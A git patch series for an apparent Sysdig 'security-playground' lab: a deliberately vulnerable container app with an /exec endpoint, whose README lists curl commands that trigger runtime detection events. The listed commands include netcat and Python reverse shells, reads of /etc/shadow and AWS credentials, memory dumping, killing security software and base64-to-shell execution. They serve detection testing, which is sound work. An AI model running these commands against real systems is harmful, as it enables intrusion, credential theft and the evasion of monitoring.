14/21] Fix broken package --- src/Dockerfile | 1 - 1 file changed, 1 deletion(-) diff --git a/src/Dockerfile b/src/Dockerfile index e0fe9c8..a0e77b9 100644 --- a/src/Dockerfile +++ b/src/Dockerfile @@ -5,7 +5,6 @@ WORKDIR /app COPY requirements.txt app.py /app/ RUN pip3 install -r requirements.txt -RUN pip3 uninstall setuptools -y EXPOSE 8080 From 6a401836545743ac71306bbadd0495120b2d828e Mon Sep 17 00:00:00 2001 From: Andrew D Date: Mon, 6 Mar 2023 10:47:25 +1100 Subject: [PATCH 15/21] Add tampering with security software test --- README.md | 6 ++++++ kubernetes-manifests/deployment.yaml | 6 ------ 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index 7b81867..ebc7d4b 100644 --- a/README.md +++ b/README.md @@ -77,6 +77,12 @@ curl -X POST http://$WEBSERVERIP/exec -d 'command=grep aws_access_key_id /tmp/' curl -X POST http://$WEBSERVERIP/exec -d 'command=nc -c bash 10.0.0.1 4242' ``` +**Sysdig Event:** Tampering with Security Software in Container +**Command:** +``` +curl -X POST http://$WEBSERVERIP/exec -d 'command=pkill aliyun-service' +``` + ### Sysdig Managed Policy: Sysdig Runtime Notable Events (Severity: Medium) **Sysdig Event:** Read sensitive file untrusted diff --git a/kubernetes-manifests/deployment.yaml b/kubernetes-manifests/deployment.yaml index 7f8e6ae..e0e8bf7 100644 --- a/kubernetes-manifests/deployment.yaml +++ b/kubernetes-manifests/deployment.yaml @@ -1,13 +1,7 @@ -apiVersion: v1 -kind: Namespace -metadata: - name: secplay ---- apiVersion: apps/v1 kind: Deployment metadata: name: security-playground - namespace: secplay labels: app: security-playground spec: From b1fb7fb7f7750a39ac038a547a8063a4bf538e51 Mon Sep 17 00:00:00 2001 From: andrewd-sysdig <90011178+andrewd-sysdig@users.noreply.github.com> Date: Fri, 14 Apr 2023 14:43:23 +1000 Subject: [PATCH 16/21] Update README.md --- README.md | 48 ++++++++++++++++-------------------------------- 1 file changed, 16 insertions(+), 32 deletions(-) diff --git a/README.md b/README.md index ebc7d4b..76b0277 100644 --- a/README.md +++ b/README.md @@ -54,39 +54,23 @@ Set the WEBSERVERIP env variable to be the IP of your target (the pod/service) export WEBSERVERIP=192.168.1.15 ``` -### Sysdig Managed Policy: Sysdig Runtime Threat Detection (Severity: High) +## Library of curl commands to trigger various Sysdig Events -**Sysdig Event:** Reconnaissance attempt to find SUID binaries -**Command:** -``` -curl -X POST http://$WEBSERVERIP/exec -d 'command=find / -perm -u=s -type f 2>/dev/null' -``` -**Sysdig Event:** Dump memory for credentials -**Command:** -``` -curl -X POST http://$WEBSERVERIP/exec -d 'command=grep passwd /proc/1/mem' -``` -**Sysdig Event:** Find AWS Credentials -**Command:** -``` -curl -X POST http://$WEBSERVERIP/exec -d 'command=grep aws_access_key_id /tmp/' -``` -**Sysdig Event:** Netcat Remote Code Execution in Contianer -**Command:** -``` -curl -X POST http://$WEBSERVERIP/exec -d 'command=nc -c bash 10.0.0.1 4242' -``` +> **Sysdig Managed Policy: Sysdig Runtime Threat Detection (Severity: High)** -**Sysdig Event:** Tampering with Security Software in Container -**Command:** -``` -curl -X POST http://$WEBSERVERIP/exec -d 'command=pkill aliyun-service' -``` +| Sysdig Event | Curl Command | +|---|---| +| Reconnaissance attempt to find SUID binaries | `curl -X POST http://$WEBSERVERIP=/exec -d 'command=find / -perm -u=s -type f 2>/dev/null'` | +| Dump memory for credentials | `curl -X POST http://$WEBSERVERIP=/exec -d 'command=grep passwd /proc/1/mem'` | +| Find AWS Credentials | `curl -X POST http://$WEBSERVERIP=/exec -d 'command=grep aws_access_key_id /tmp/'` | +| Netcat Remote Code Execution in Contianer | `curl -X POST http://$WEBSERVERIP=/exec -d 'command=nc -c bash 10.0.0.1 4242'` | +| Suspicious Home Directory Creation | `curl -X POST http://$WEBSERVERIP=/exec -d 'command=adduser -h /dev/null -s /bin/sh test3 -D'` | +| Base64-encoded Python Script Execution | `curl -X POST http://$WEBSERVERIP=/exec -d 'command=echo cHl0aG9uMyAtYyAnaW1wb3J0IF9faGVsbG9fXycK \| base64 -d \| sh'` | +| Base64-encoded Shell Script Execution | `curl -X POST http://$WEBSERVERIP=/exec -d 'command=echo IyEvYmluL3NoCmVjaG8gIkhlbGxvIFdvcmxkIgo= \|base64 -d \|sh'` | +| Base64'd ELF file on Command Line | `curl -X POST http://$WEBSERVERIP=/exec -d 'command=echo f0VMRgIB1M== \|base64 -d > hello'` | -### Sysdig Managed Policy: Sysdig Runtime Notable Events (Severity: Medium) +> **Sysdig Managed Policy: Sysdig Runtime Notable Events (Severity: Medium)** -**Sysdig Event:** Read sensitive file untrusted -**Command:** -``` -curl http://$WEBSERVERIP/etc/shadow -``` \ No newline at end of file +| Sysdig Event | Curl Command | +|---|---| +| Read sensitive file untrusted | `curl http://$WEBSERVERIP=/etc/shadow` | From ef30e68bdcbf923712696c42ad04ceb494226c6b Mon Sep 17 00:00:00 2001 From: Andrew D Date: Tue, 25 Apr 2023 11:44:45 +1000 Subject: [PATCH 17/21] Remove = char from examples --- README.md | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/README.md b/README.md index 76b0277..139c8a6 100644 --- a/README.md +++ b/README.md @@ -60,17 +60,17 @@ export WEBSERVERIP=192.168.1.15 | Sysdig Event | Curl Command | |---|---| -| Reconnaissance attempt to find SUID binaries | `curl -X POST http://$WEBSERVERIP=/exec -d 'command=find / -perm -u=s -type f 2>/dev/null'` | -| Dump memory for credentials | `curl -X POST http://$WEBSERVERIP=/exec -d 'command=grep passwd /proc/1/mem'` | -| Find AWS Credentials | `curl -X POST http://$WEBSERVERIP=/exec -d 'command=grep aws_access_key_id /tmp/'` | -| Netcat Remote Code Execution in Contianer | `curl -X POST http://$WEBSERVERIP=/exec -d 'command=nc -c bash 10.0.0.1 4242'` | -| Suspicious Home Directory Creation | `curl -X POST http://$WEBSERVERIP=/exec -d 'command=adduser -h /dev/null -s /bin/sh test3 -D'` | -| Base64-encoded Python Script Execution | `curl -X POST http://$WEBSERVERIP=/exec -d 'command=echo cHl0aG9uMyAtYyAnaW1wb3J0IF9faGVsbG9fXycK \| base64 -d \| sh'` | -| Base64-encoded Shell Script Execution | `curl -X POST http://$WEBSERVERIP=/exec -d 'command=echo IyEvYmluL3NoCmVjaG8gIkhlbGxvIFdvcmxkIgo= \|base64 -d \|sh'` | -| Base64'd ELF file on Command Line | `curl -X POST http://$WEBSERVERIP=/exec -d 'command=echo f0VMRgIB1M== \|base64 -d > hello'` | +| Reconnaissance attempt to find SUID binaries | `curl -X POST http://$WEBSERVERIP/exec -d 'command=find / -perm -u=s -type f 2>/dev/null'` | +| Dump memory for credentials | `curl -X POST http://$WEBSERVERIP/exec -d 'command=grep passwd /proc/1/mem'` | +| Find AWS Credentials | `curl -X POST http://$WEBSERVERIP/exec -d 'command=grep aws_access_key_id /tmp/'` | +| Netcat Remote Code Execution in Contianer | `curl -X POST http://$WEBSERVERIP/exec -d 'command=nc -c bash 10.0.0.1 4242'` | +| Suspicious Home Directory Creation | `curl -X POST http://$WEBSERVERIP/exec -d 'command=adduser -h /dev/null -s /bin/sh test3 -D'` | +| Base64-encoded Python Script Execution | `curl -X POST http://$WEBSERVERIP/exec -d 'command=echo cHl0aG9uMyAtYyAnaW1wb3J0IF9faGVsbG9fXycK \| base64 -d \| sh'` | +| Base64-encoded Shell Script Execution | `curl -X POST http://$WEBSERVERIP/exec -d 'command=echo IyEvYmluL3NoCmVjaG8gIkhlbGxvIFdvcmxkIgo= \|base64 -d \|sh'` | +| Base64'd ELF file on Command Line | `curl -X POST http://$WEBSERVERIP/exec -d 'command=echo f0VMRgIB1M== \|base64 -d > hello'` | > **Sysdig Managed Policy: Sysdig Runtime Notable Events (Severity: Medium)** | Sysdig Event | Curl Command | |---|---| -| Read sensitive file untrusted | `curl http://$WEBSERVERIP=/etc/shadow` | +| Read sensitive file untrusted | `curl http://$WEBSERVERIP/etc/shadow` | From 4cefee51d8c0edb778c8c70d9fe9aca0c0777b39 Mon Sep 17 00:00:00 2001 From: Andrew D Date: Thu, 27 Apr 2023 07:59:57 +1000 Subject: [PATCH 18/21] Add Reverse Shell example --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 139c8a6..434d306 100644 --- a/README.md +++ b/README.md @@ -74,3 +74,4 @@ export WEBSERVERIP=192.168.1.15 | Sysdig Event | Curl Command | |---|---| | Read sensitive file untrusted | `curl http://$WEBSERVERIP/etc/shadow` | +| Redirect STDOUT/STDIN to Network Connection in Container | `curl -X POST ${WEBSERVERIP}/exec -d command="python -c 'import socket,os,pty;s=socket.socket();s.connect((\"192.168.1.3\",4242));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")'"` | From 7d29e9c85214cfb66867fb60ff5a7a88b597e4f4 Mon Sep 17 00:00:00 2001 From: Michael Scholl <95244848+mikescholl-sysdig@users.noreply.github.com> Date: Fri, 28 Apr 2023 15:08:23 -0700 Subject: [PATCH 19/21] Update Dockerfile --- src/Dockerfile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/Dockerfile b/src/Dockerfile index a0e77b9..8bf417d 100644 --- a/src/Dockerfile +++ b/src/Dockerfile @@ -1,4 +1,4 @@ -FROM python:3.9-alpine +FROM python:3.9 WORKDIR /app From 5130a24d870a85f0a04853ed3fddf764a467a864 Mon Sep 17 00:00:00 2001 From: Michael Scholl <95244848+mikescholl-sysdig@users.noreply.github.com> Date: Fri, 28 Apr 2023 15:11:08 -0700 Subject: [PATCH 20/21] Update Dockerfile --- src/Dockerfile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/Dockerfile b/src/Dockerfile index 8bf417d..1590216 100644 --- a/src/Dockerfile +++ b/src/Dockerfile @@ -1,4 +1,4 @@ -FROM python:3.9 +FROM python:3.9-buster WORKDIR /app From f0c9939b6586ff4cbe4802944d318b156020f72e Mon Sep 17 00:00:00 2001 From: Michael Scholl <95244848+mikescholl-sysdig@users.noreply.github.com> Date: Fri, 28 Apr 2023 15:17:14 -0700 Subject: [PATCH 21/21] Update docker-image.yml --- .github/workflows/docker-image.yml | 37 +++++++++++++++--------------- 1 file changed, 19 insertions(+), 18 deletions(-) diff --git a/.github/workflows/docker-image.yml b/.github/workflows/docker-image.yml index f095dbc..b303ab7 100644 --- a/.github/workflows/docker-image.yml +++ b/.github/workflows/docker-image.yml @@ -5,10 +5,8 @@ on: branches: [ "master" ] env: - SYSDIG_URL: https://app.au1.sysdig.com REGISTRY: ghcr.io IMAGE_NAME: ${{ github.repository }} - BYPASS_SCAN_FAIL: true jobs: build: @@ -18,20 +16,23 @@ jobs: - name: Checkout code uses: actions/checkout@v3 - - name: Build the Docker image - run: | - docker build ./src --file src/Dockerfile --tag ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:${{ github.run_number }} --tag ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:latest - docker build ./src --file src/Dockerfile.user --tag ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:user-${{ github.run_number }} --tag ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:user-latest - - - name: Sysdig Secure Inline Scan - New - run: | - curl -LO "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -L -s https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner" - chmod +x ./sysdig-cli-scanner - SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} ./sysdig-cli-scanner --apiurl ${{env.SYSDIG_URL}} docker://${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:${{ github.run_number }} || ${{ env.BYPASS_SCAN_FAIL }} - - name: Log in to the Container registry - run: docker login -u ${{ github.actor }} -p ${{ secrets.GITHUB_TOKEN }} ${{ env.REGISTRY }} - - - name: Push the Docker image - run: | - docker push -a ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }} + uses: docker/login-action@65b78e6e13532edd9afa3aa52ac7964289d1a9c1 + with: + registry: ${{ env.REGISTRY }} + username: ${{ github.actor }} + password: ${{ secrets.GITHUB_TOKEN }} + + - name: Extract metadata (tags, labels) for Docker + id: meta + uses: docker/metadata-action@9ec57ed1fcdbf14dcef7dfbe97b2010124a938b7 + with: + images: ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }} + + - name: Build and push Docker image + uses: docker/build-push-action@f2a1d5e99d037542a71f64918e516c093c6f3fc4 + with: + context: ./src/. + push: true + tags: ${{ steps.meta.outputs.tags }} + labels: ${{ steps.meta.outputs.labels }}